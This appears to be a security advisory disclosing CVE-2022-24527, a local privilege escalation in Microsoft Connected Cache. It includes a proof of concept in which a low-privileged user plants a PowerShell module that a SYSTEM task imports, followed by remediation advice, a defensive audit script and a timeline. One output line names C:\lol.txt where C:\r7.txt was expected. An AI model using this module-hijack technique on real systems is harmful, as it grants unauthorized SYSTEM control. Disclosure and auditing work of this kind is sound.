![CVE-2022-24527: Microsoft Connected Cache Local Privilege Escalation (Fixed)](https://blog.rapid7.com/content/images/2022/04/ms-connected-cache-vuln.jpg)
On April 12, 2022, Microsoft published [CVE-2022-24527](), a local privilege escalation vulnerability in Microsoft [Connected Cache](). The vulnerability allowed a local low-privileged user to execute arbitrary PowerShell as `SYSTEM` due to improper file permission assignment ([CWE-732]()).
## Product description
Connected Cache is a feature used by [Microsoft Endpoint Manager]() [Distribution Points]() to support Delivery Optimization.
## Credit
This issue was discovered and reported by security researcher [Jake Baines]() as part of [Rapid7’s vulnerability disclosure program]().
## Exploitation
When Connected Cache is in use on a Distribution Point, it is installed, in part, into `C:\Doinc`. Below, you can see that there are some PowerShell scripts within that directory:
```
C:\>dir /s /b C:\Doinc
C:\Doinc\Product
C:\Doinc\Product\Install
C:\Doinc\Product\Install\Logs
C:\Doinc\Product\Install\Tasks
C:\Doinc\Product\Install\Tasks\CacheNodeKeepAlive.ps1
C:\Doinc\Product\Install\Tasks\Maintenance.ps1
C:\Doinc\Product\Install\Tasks\SetDrivesToHealthy.ps1
```
Low-privileged users only have `read` and `execute` permissions on the PowerShell scripts:
```
C:\Doinc\Product\Install\Tasks>icacls *.ps1
CacheNodeKeepAlive.ps1 NT AUTHORITY\SYSTEM:(I)(F)
                       NT AUTHORITY\NETWORK SERVICE:(I)(F)
                       BUILTIN\Administrators:(I)(F)
                       BUILTIN\Users:(I)(RX)

Maintenance.ps1 NT AUTHORITY\SYSTEM:(I)(F)
                NT AUTHORITY\NETWORK SERVICE:(I)(F)
                BUILTIN\Administrators:(I)(F)
                BUILTIN\Users:(I)(RX)

SetDrivesToHealthy.ps1 NT AUTHORITY\SYSTEM:(I)(F)
                       NT AUTHORITY\NETWORK SERVICE:(I)(F)
                       BUILTIN\Administrators:(I)(F)
                       BUILTIN\Users:(I)(RX)

Successfully processed 3 files; Failed processing 0 files
```
The PowerShell scripts are executed every 60 seconds by the Task Scheduler as `NT AUTHORITY\SYSTEM`. All that is fine. The following part is where trouble begins. This is how `SetDrivesToHealthy.ps1` starts:
```powershell
try
{
    import-module 'webAdministration'
    $error.clear()
```
When `SetDrivesToHealthy.ps1` executes, it attempts to load the `webAdministration` module. Before searching the normal `%PSModulePath%` locations, `SetDrivesToHealthy.ps1` looks for the import in `C:\Doinc\Product\Install\Tasks\WindowsPowerShell\Modules\webAdministration`. As we saw above, this directory doesn't exist. And while low-privileged users can't modify the Connected Cache PowerShell scripts, they do have sufficient privileges (`AD`, add subdirectory, and `WD`, add file) to create subdirectories and files in `C:\Doinc\Product\Install\Tasks`:
```
C:\Doinc\Product\Install>icacls ./Tasks/
./Tasks/ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
         NT AUTHORITY\NETWORK SERVICE:(I)(OI)(CI)(F)
         BUILTIN\Administrators:(I)(OI)(CI)(F)
         BUILTIN\Users:(I)(OI)(CI)(RX)
         BUILTIN\Users:(I)(CI)(AD)
         BUILTIN\Users:(I)(CI)(WD)
         CREATOR OWNER:(I)(OI)(CI)(IO)(F)
```
An attacker can create the necessary directory structure and place their own `webAdministration` module there so that `SetDrivesToHealthy.ps1` will import it. In the proof of concept below, the low-privileged attacker creates the directory structure and a module file containing a single command that creates `C:\r7.txt`.
```
C:\Doinc\Product\Install\Tasks>dir C:\
 Volume in drive C has no label.
 Volume Serial Number is 3073-81A6

 Directory of C:\

01/04/2022  05:01 PM    <DIR>          Doinc
01/04/2022  05:15 PM    <DIR>          DOINC-E77D08D0-5FEA-4315-8C95-10D359D59294
01/04/2022  03:48 PM    <DIR>          inetpub
07/07/2021  04:05 AM    <DIR>          PerfLogs
01/05/2022  09:29 AM    <DIR>          Program Files
01/05/2022  09:29 AM    <DIR>          Program Files (x86)
01/05/2022  09:16 AM    <DIR>          SCCMContentLib
01/05/2022  09:15 AM    <DIR>          SMSPKGC$
01/05/2022  09:17 AM    <DIR>          SMSSIG$
01/05/2022  09:17 AM    <DIR>          SMS_DP$
01/04/2022  05:04 PM    <DIR>          Users
01/04/2022  03:48 PM    <DIR>          Windows
               0 File(s)              0 bytes
              12 Dir(s)  239,837,327,360 bytes free

C:\Doinc\Product\Install\Tasks>mkdir WindowsPowerShell

C:\Doinc\Product\Install\Tasks>mkdir WindowsPowerShell\Modules

C:\Doinc\Product\Install\Tasks>mkdir WindowsPowerShell\Modules\webAdministration

C:\Doinc\Product\Install\Tasks>echo New-Item C:\r7.txt > WindowsPowerShell\Modules\webAdministration\webAdministration.psm1

C:\Doinc\Product\Install\Tasks>dir C:\
 Volume in drive C has no label.
 Volume Serial Number is 3073-81A6

 Directory of C:\

01/04/2022  05:01 PM    <DIR>          Doinc
01/04/2022  05:15 PM    <DIR>          DOINC-E77D08D0-5FEA-4315-8C95-10D359D59294
01/04/2022  03:48 PM    <DIR>          inetpub
01/05/2022  01:49 PM                 0 r7.txt
07/07/2021  04:05 AM    <DIR>          PerfLogs
01/05/2022  09:29 AM    <DIR>          Program Files
01/05/2022  09:29 AM    <DIR>          Program Files (x86)
01/05/2022  09:16 AM    <DIR>          SCCMContentLib
01/05/2022  09:15 AM    <DIR>          SMSPKGC$
01/05/2022  09:17 AM    <DIR>          SMSSIG$
01/05/2022  09:17 AM    <DIR>          SMS_DP$
01/04/2022  05:04 PM    <DIR>          Users
01/04/2022  03:48 PM    <DIR>          Windows
               1 File(s)              0 bytes
              12 Dir(s)  239,836,917,760 bytes free

C:\Doinc\Product\Install\Tasks>icacls C:\r7.txt
C:\lol.txt NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Administrators:(I)(F)
           BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

C:\Doinc\Product\Install\Tasks>
```
As you can see, the `C:\r7.txt` file is created by the `SYSTEM`-level task, demonstrating the privilege escalation.
## Remediation
Follow Microsoft guidance on updating the Distribution Point software. If that is not possible, disabling the caching feature will effectively mitigate this issue.
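The audit script below is an added example, not part of the Rapid7 advisory or of Microsoft's product. It checks a scheduled-task script directory for the two conditions the write-up relies on: a low-privileged principal holding create-file or create-directory rights on the directory, and the presence of a `WindowsPowerShell\Modules` tree beneath it that a `SYSTEM` task could import from. The default path is the Connected Cache `Tasks` directory shown above; the principal list and right mask are the author's choices for this example.

```powershell
# Added example: audit a directory that a SYSTEM scheduled task loads scripts from.
# Run as an administrator on the Distribution Point. $TaskDir defaults to the
# Connected Cache location from the advisory; point it at any other task directory.
param(
    [string]$TaskDir = 'C:\Doinc\Product\Install\Tasks'
)

# Principals that should never be able to add files or folders under a
# directory from which SYSTEM executes or imports PowerShell code.
$LowPrivPrincipals = @(
    'BUILTIN\Users',
    'Everyone',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any one of these rights is enough to plant <Modules>\<name>\<name>.psm1.
# CreateFiles is icacls (WD) and CreateDirectories is icacls (AD), the two
# BUILTIN\Users ACEs that made the original Tasks directory exploitable.
$fsr = [System.Security.AccessControl.FileSystemRights]
$WriteRights = $fsr::CreateFiles -bor $fsr::CreateDirectories -bor `
               $fsr::Write -bor $fsr::Modify -bor $fsr::FullControl

function Test-TaskDirHijack {
    param([Parameter(Mandatory)][string]$Dir)
    $findings = @()

    # Condition 1: a low-privileged principal can create content in $Dir.
    $acl = Get-Acl -LiteralPath $Dir
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $WriteRights) -ne 0) {
            $findings += "WRITABLE: $($ace.IdentityReference) has $($ace.FileSystemRights) on $Dir"
        }
    }

    # Condition 2: a module tree already sits where the vulnerable import looks.
    # Its presence on a patched or unpatched host warrants investigation.
    $shadow = Join-Path $Dir 'WindowsPowerShell\Modules'
    if (Test-Path -LiteralPath $shadow) {
        Get-ChildItem -LiteralPath $shadow -Recurse -Include *.psm1, *.psd1, *.dll -File |
            ForEach-Object {
                $owner = (Get-Acl -LiteralPath $_.FullName).Owner
                $findings += "SHADOW MODULE: $($_.FullName) (owner: $owner)"
            }
    }
    return $findings
}

$results = @(Test-TaskDirHijack -Dir $TaskDir)
if ($results.Count -eq 0) { "OK: no low-privileged write access and no module tree under $TaskDir" }
else { $results }
```

A clean result still assumes the scripts themselves are not writable; run `icacls *.ps1` in the same directory, as the write-up does, to confirm `BUILTIN\Users` holds only `(RX)`.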
## Disclosure timeline
**January 5, 2022:** Issue disclosed to the vendor
**January 5, 2022:** Vendor acknowledgement
**January 6, 2022:** Vendor assigns a case identifier
**January 10-11, 2022:** Vendor and researcher discuss clarifying details
**January 19, 2022:** Vendor confirms the vulnerability
**February-March 2022:** Vendor and researcher coordinate on disclosure date and CVE assignment
**April 12, 2022:** Public disclosure (this document)